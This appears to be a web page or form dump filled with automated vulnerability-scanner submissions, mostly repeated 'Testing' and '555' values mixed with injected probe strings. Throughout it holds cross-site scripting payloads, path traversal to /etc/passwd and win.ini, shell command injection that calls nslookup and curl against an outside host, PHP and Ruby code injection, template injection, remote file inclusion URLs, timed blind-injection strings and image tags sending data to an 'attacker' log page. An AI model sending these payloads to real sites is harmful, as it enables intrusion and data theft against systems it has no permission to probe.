Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
dfb{{98991*97996}}xca

555


...
Testing

555<ScR<ScRiPt>IpT>fMQA(9339)</sCr<ScRiPt>IpT>


...
Testing

555


...
../../../../../../../../../../../../../../etc/passwd

555


...
echo nxkodk$()\ ctzdby\nz^xyu||a #' &echo nxkodk$()\ ctzdby\nz^xyu||a #|" &echo nxkodk$()\ ctzdby\nz^xyu||a #

555


...
../../../../../../../../../../../../../../windows/win.ini

555


...
&echo iogmma$()\ pcrpyt\nz^xyu||a #' &echo iogmma$()\ pcrpyt\nz^xyu||a #|" &echo iogmma$()\ pcrpyt\nz^xyu||a #

555


...
file:///etc/passwd

555


...
Testing&echo cgzumc$()\ zaljef\nz^xyu||a #' &echo cgzumc$()\ zaljef\nz^xyu||a #|" &echo cgzumc$()\ zaljef\nz^xyu||a #

555


...
Testing

555


...
|echo nvzwhy$()\ iucudj\nz^xyu||a #' |echo nvzwhy$()\ iucudj\nz^xyu||a #|" |echo nvzwhy$()\ iucudj\nz^xyu||a #

555


...
../Testing

555


...
Testing|echo vgyrit$()\ ubthkh\nz^xyu||a #' |echo vgyrit$()\ ubthkh\nz^xyu||a #|" |echo vgyrit$()\ ubthkh\nz^xyu||a #

555


...
Testing

555


...
expr 9000709912 - 960722

555


...
Testing

555


...
(nslookup -q=cname hithctogcyhow76ec0.bxss.me||curl hithctogcyhow76ec0.bxss.me))

555


...
Testing

555


...
dfb[[${98991*97996}]]xca

555


...
Testing

555<ScRiPt >fMQA(9900)</ScRiPt>


...
$(nslookup -q=cname hitpjcehcftmi28d4e.bxss.me||curl hitpjcehcftmi28d4e.bxss.me)

555


...
Testing

555


...
&nslookup -q=cname hitwnroylovmra3ef8.bxss.me&'\"`0&nslookup -q=cname hitwnroylovmra3ef8.bxss.me&`'

555


...
Testing

555


...
&(nslookup -q=cname hitzbdteqmmmk2c22c.bxss.me||curl hitzbdteqmmmk2c22c.bxss.me)&'\"`0&(nslookup -q=cname hitzbdteqmmmk2c22c.bxss.me||curl hitzbdteqmmmk2c22c.bxss.me)&`'

555


...
Testing

555<esi:include src="http://bxss.me/rpb.png"/>


...
|(nslookup -q=cname hitgomltowzej540d5.bxss.me||curl hitgomltowzej540d5.bxss.me)

555


...
Testing

555


...
`(nslookup -q=cname hitcmhkuhikpoa6d4f.bxss.me||curl hitcmhkuhikpoa6d4f.bxss.me)`

555


...
Testing<esi:include src="http://bxss.me/rpb.png"/>

555


...
;(nslookup -q=cname hitnldypickhm5cccc.bxss.me||curl hitnldypickhm5cccc.bxss.me)|(nslookup -q=cname hitnldypickhm5cccc.bxss.me||curl hitnldypickhm5cccc.bxss.me)&(nslookup -q=cname hitnldypickhm5cccc.bxss.me||curl hitnldypickhm5cccc.bxss.me)

555


...
Testing

555


...
|(nslookup${IFS}-q${IFS}cname${IFS}hitacvhwjnaemc25e4.bxss.me||curl${IFS}hitacvhwjnaemc25e4.bxss.me)

555


...
Testing

${9999296+10000378}


...
&(nslookup${IFS}-q${IFS}cname${IFS}hitsakjdqumxae3e17.bxss.me||curl${IFS}hitsakjdqumxae3e17.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitsakjdqumxae3e17.bxss.me||curl${IFS}hitsakjdqumxae3e17.bxss.me)&`'

555


...
Testing

555


...
dfb__${98991*97996}__::.x

555


...
Testing

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9739></ScRiPt>


...
Testing

555


...
${9999556+9999944}

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


...
Testing

555


...
Testing

';print(md5(31337));$a='


...
Testing

555


...
Testing

";print(md5(31337));$a="


...
Testing

555


...
Testing

${@print(md5(31337))}


...
Testing

555


...
Testing

${@print(md5(31337))}\


...
Testing

555


...
Testing

'.print(md5(31337)).'


...
Testing

555<ScRiPt >fMQA(9695)</ScRiPt>


...
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555


...
Testing

555


...
Testing

<?php print(md5(31337));?>


...
Testing

555


...
Testing

'{${print(md5(31337))}}'


...
Testing

555


...
Testing

print(md5(31337));//


...
Testing

555


...
Testing

{php}print(md5(31337));{/php}


...
Testing

555


...
Testing

[php]print(md5(31337));[/php]


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

'.gethostbyname(lc('hitzk'.'egpphkfzb066e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(87).chr(114).chr(84).'


...
Testing

555


...
Testing<ScRiPt >BL6v(9664)</ScRiPt>

555


...
Testing

".gethostbyname(lc("hitpi"."xmpbotka179b1.bxss.me."))."A".chr(67).chr(hex("58")).chr(113).chr(90).chr(105).chr(79)."


...
Testing

555


...
Testing

555<isindex type=image src=1 onerror=fMQA(9715)>


...
Testing

gethostbyname(lc('hitez'.'qkcojiele48ff.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(87).chr(108).chr(88)


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
'.gethostbyname(lc('hitvd'.'dcnbugnb1a46c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(83).chr(116).chr(79).'

555


...
Testing

555


...
".gethostbyname(lc("hitrc"."nnjmnurgca058.bxss.me."))."A".chr(67).chr(hex("58")).chr(103).chr(68).chr(113).chr(78)."

555


...
Testing

555


...
gethostbyname(lc('hitoz'.'iccgqrff83831.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(71).chr(119).chr(70)

555


...
Testing

555


...
Testing<WBCQ5A>0K1CU[!+!]</WBCQ5A>

555


...
Testing

555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9283'>


...
Testing

555


...
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

555


...
Testing

555


...
';print(md5(31337));$a='

555


...
Testing

555


...
";print(md5(31337));$a="

555


...
Testing

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg


...
${@print(md5(31337))}

555


...
Testing

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg


...
${@print(md5(31337))}\

555


...
Testing

/etc/shells


...
'.print(md5(31337)).'

555


...
Testing

../../../../../../../../../../../../../../etc/shells


...
<?php print(md5(31337));?>

555


...
Testing

c:/windows/win.ini


...
Testing<script>BL6v(9346)</script>

555


...
'{${print(md5(31337))}}'

555


...
Testing

555<body onload=fMQA(9203)>


...
Testing

bxss.me


...
print(md5(31337));//

555


...
Testing

Http://bxss.me/t/fit.txt


...
{php}print(md5(31337));{/php}

555


...
Testing

http://bxss.me/t/fit.txt?.jpg


...
[php]print(md5(31337));[/php]

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing<script>BL6v(9725)</script>9725

555


...
Testing

555


...
Testing

555<img src=//xss.bxss.me/t/dot.gif onload=fMQA(9978)>


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

555


...
Testing

555


...
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

555


...
Testing

555


...
/etc/shells

555


...
Testing

555


...
../../../../../../../../../../../../../../etc/shells

555


...
Testing

HttP://bxss.me/t/xss.html?%00


...
Testing<ScR<ScRiPt>IpT>BL6v(9760)</sCr<ScRiPt>IpT>

555


...
c:/windows/win.ini

555


...
Testing

555<img src=xyz OnErRor=fMQA(9744)>


...
Testing

bxss.me/t/xss.html?%00


...
bxss.me

555


...
Testing

http://bxss.me/t/rfi.php?%00


...
Http://bxss.me/t/fit.txt

555


...
Testing

bxss.me/t/rfi.php?%00


...
http://bxss.me/t/fit.txt?.jpg

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing<ScRiPt >BL6v(9937)</ScRiPt>

555


...
HttP://bxss.me/t/xss.html?%00

555


...
Testing

555


...
Testing

555<img/src=">" onerror=alert(9450)>


...
bxss.me/t/xss.html?%00

555


...
Testing

555


...
http://bxss.me/t/rfi.php?%00

555


...
Testing

555


...
bxss.me/t/rfi.php?%00

555


...
Testing

555


...
Testing

555


...
Testing

"+"A".concat(70-3).concat(22*4).concat(99).concat(85).concat(114).concat(86)+(require"socket" Socket.gethostbyname("hitcw"+"jmuulynu2200b.bxss.me.")[3].to_s)+"


...
Testing

555


...
Testing

'+'A'.concat(70-3).concat(22*4).concat(98).concat(81).concat(106).concat(68)+(require'socket' Socket.gethostbyname('hituq'+'yuwfckot00d6f.bxss.me.')[3].to_s)+'


...
Testing

555


...
Testing

'A'.concat(70-3).concat(22*4).concat(112).concat(88).concat(113).concat(86)+(require'socket' Socket.gethostbyname('hitvp'+'oodjwttqb6740.bxss.me.')[3].to_s)


...
Testing

555


...
Testing

555


...
Testing<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9250></ScRiPt>

555


...
Testing

%35%35%35%3C%53%63%52%69%50%74%20%3E%66%4D%51%41%289483%29%3C%2F%73%43%72%69%70%54%3E


...
Testing

555


...
Testing

1


...
Testing

555


...
Testing

1


...
"+"A".concat(70-3).concat(22*4).concat(103).concat(85).concat(113).concat(73)+(require"socket" Socket.gethostbyname("hitnt"+"pfvhjkol92ca9.bxss.me.")[3].to_s)+"

555


...
Testing

1/.


...
'+'A'.concat(70-3).concat(22*4).concat(106).concat(85).concat(114).concat(66)+(require'socket' Socket.gethostbyname('hitzt'+'acgnrvzbd489a.bxss.me.')[3].to_s)+'

555


...
Testing

555


...
'A'.concat(70-3).concat(22*4).concat(110).concat(84).concat(113).concat(80)+(require'socket' Socket.gethostbyname('hitqb'+'bdzszalb6615c.bxss.me.')[3].to_s)

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
1

555


...
Testing

555


...
1

555


...
Testing<ScRiPt >BL6v(9870)</ScRiPt>

555


...
Testing

555\u003CScRiPt\fMQA(9195)\u003C/sCripT\u003E


...
Testing

redirtest.acx


...
1/.

555


...
Testing

555


...
Testing

555


...
redirtest.acx

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555&n998330=v988879


...
Testing

)


...
Testing

!(()&&!|*|*|


...
Testing

^(#$!@#$)(()))******


...
Testing

555


...
Testing

555&lt;ScRiPt&gt;fMQA(9402)&lt;/sCripT&gt;


...
Testing<isindex type=image src=1 onerror=BL6v(9311)>

555


...
Testing

555


...
Testing

555


...
)

555


...
!(()&&!|*|*|

555


...
Testing

555


...
^(#$!@#$)(()))******

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9526'>

555


...
Testing

555<input autofocus onfocus=fMQA(9319)>


...
Testing&n916468=v926144

555


...
Testing

555


...
Testing<body onload=BL6v(9898)>

555


...
Testing

<a HrEF=http://xss.bxss.me></a>


...
Testing

555


...
Testing<img src=//xss.bxss.me/t/dot.gif onload=BL6v(9572)>

555


...
Testing

'"()


...
Testing

<a HrEF=jaVaScRiPT:>


...
Testing

555'&&sleep(27*1000)*hcgvnj&&'


...
Testing

555"&&sleep(27*1000)*uupwce&&"


...
Testing

555'||sleep(27*1000)*gzvyvy||'


...
Testing

555"||sleep(27*1000)*bawrmg||"


...
Testing

555'"()&%<zzz><ScRiPt >uQ0K(9456)</ScRiPt>


...
Testing<img src=xyz OnErRor=BL6v(9739)>

555


...
Testing

555}body{zzz:Expre/**/SSion(fMQA(9207))}


...
Testing

555


...
Testing

555


...
Testing

'"()&%<zzz><ScRiPt >uQ0K(9475)</ScRiPt>


...
Testing<img/src=">" onerror=alert(9664)>

555


...
Testing

555F0Xj8 <ScRiPt >fMQA(9100)</ScRiPt>


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

5559609796


...
Testing

555


...
Testing

555


...
%54%65%73%74%69%6E%67%3C%53%63%52%69%50%74%20%3E%42%4C%36%76%289920%29%3C%2F%73%43%72%69%70%54%3E

555


...
Testing

555<WS0BQB>5JTD2[!+!]</WS0BQB>


...
Testing

555


...
Testing

555


...
Testing'"()&%<zzz><ScRiPt >G3GM(9434)</ScRiPt>

555


...
Testing\u003CScRiPt\BL6v(9258)\u003C/sCripT\u003E

555


...
Testing

555<ifRAme sRc=9161.com></IfRamE>


...
Testing

555


...
Testing

555


...
Testing&lt;ScRiPt&gt;BL6v(9008)&lt;/sCripT&gt;

555


...
Testing

555<agNJY9F x=9290>


...
'"()

555


...
'"()&%<zzz><ScRiPt >G3GM(9988)</ScRiPt>

555


...
Testing'&&sleep(27*1000)*ifdrtw&&'

555


...
Testing"&&sleep(27*1000)*viejtu&&"

555


...
Testing'||sleep(27*1000)*elxqrq||'

555


...
Testing"||sleep(27*1000)*hwevyd||"

555


...
Testing

555<img sRc='http://attacker-9182/log.php?


...
Testing

555


...
Testing<input autofocus onfocus=BL6v(9911)>

555


...
Testing9635609

555


...
Testing

555


...
Testing

555<aut191y<


...
<a HrEF=http://xss.bxss.me></a>

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
<a HrEF=jaVaScRiPT:>

555


...
Testing}body{zzz:Expre/**/SSion(BL6v(9698))}

555


...
Testing

555


...
Testing2Xfj0 <ScRiPt >BL6v(9807)</ScRiPt>

555


...
Testing

555


...
Testing<WCEDVY>BFBH0[!+!]</WCEDVY>

555


...
Testing'"()&%<zzz><ScRiPt >fMQA(9089)</ScRiPt>

555


...
Testing<ifRAme sRc=9074.com></IfRamE>

555


...
'"()&%<zzz><ScRiPt >fMQA(9697)</ScRiPt>

555


...
Testing<aNsWCvi x=9020>

555


...
Testing9550311

555


...
Testing<img sRc='http://attacker-9210/log.php?

555


...
bfg10141<s1﹥s2ʺs3ʹhjl10141

555


...
Testing<aL5gbmB<

555


...
<%={{={@{#{${dfb}}%>

555


...
Testing

555


...
<th:t="${dfb}#foreach

555


...
Testing

555


...
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555


...
Testing

555


...
dfb{{98991*97996}}xca

555


...
dfb[[${98991*97996}]]xca

555


...
dfb__${98991*97996}__::.x

555


...
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555


...
Testing<ScRiPt >fMQA(9210)</ScRiPt>

555


...
Testing<WXYJON>JV0JE[!+!]</WXYJON>

555


...
Testing<script>fMQA(9041)</script>

555


...
Testing<script>fMQA(9449)</script>9449

555


...
Testing<ScR<ScRiPt>IpT>fMQA(9868)</sCr<ScRiPt>IpT>

555


...
Testing<ScRiPt >fMQA(9642)</ScRiPt>

555


...
Testing<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9001></ScRiPt>

555


...
Testing<ScRiPt >fMQA(9625)</ScRiPt>

555


...
Testing<isindex type=image src=1 onerror=fMQA(9861)>

555


...
Testing<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9409'>

555


...
Testing<body onload=fMQA(9384)>

555


...
Testing<img src=//xss.bxss.me/t/dot.gif onload=fMQA(9930)>

555


...
Testing<img src=xyz OnErRor=fMQA(9501)>

555


...
Testing<img/src=">" onerror=alert(9817)>

555


...
%54%65%73%74%69%6E%67%3C%53%63%52%69%50%74%20%3E%66%4D%51%41%289217%29%3C%2F%73%43%72%69%70%54%3E

555


...
Testing\u003CScRiPt\fMQA(9707)\u003C/sCripT\u003E

555


...
Testing&lt;ScRiPt&gt;fMQA(9989)&lt;/sCripT&gt;

555


...
Testing<input autofocus onfocus=fMQA(9728)>

555


...
<a HrEF=http://xss.bxss.me></a>

555


...
<a HrEF=jaVaScRiPT:>

555


...
Testing}body{zzz:Expre/**/SSion(fMQA(9210))}

555


...
Testinguv97X <ScRiPt >fMQA(9400)</ScRiPt>

555


...
Testing<W9FXC7>TJRLE[!+!]</W9FXC7>

555


...
Testing<ifRAme sRc=9685.com></IfRamE>

555


...
Testing<aJWtjAR x=9181>

555


...
Testing<img sRc='http://attacker-9602/log.php?

555


...
Testing<aXNIQT5<

555


...
Testing

555


...
Testing

555


...
Testing

555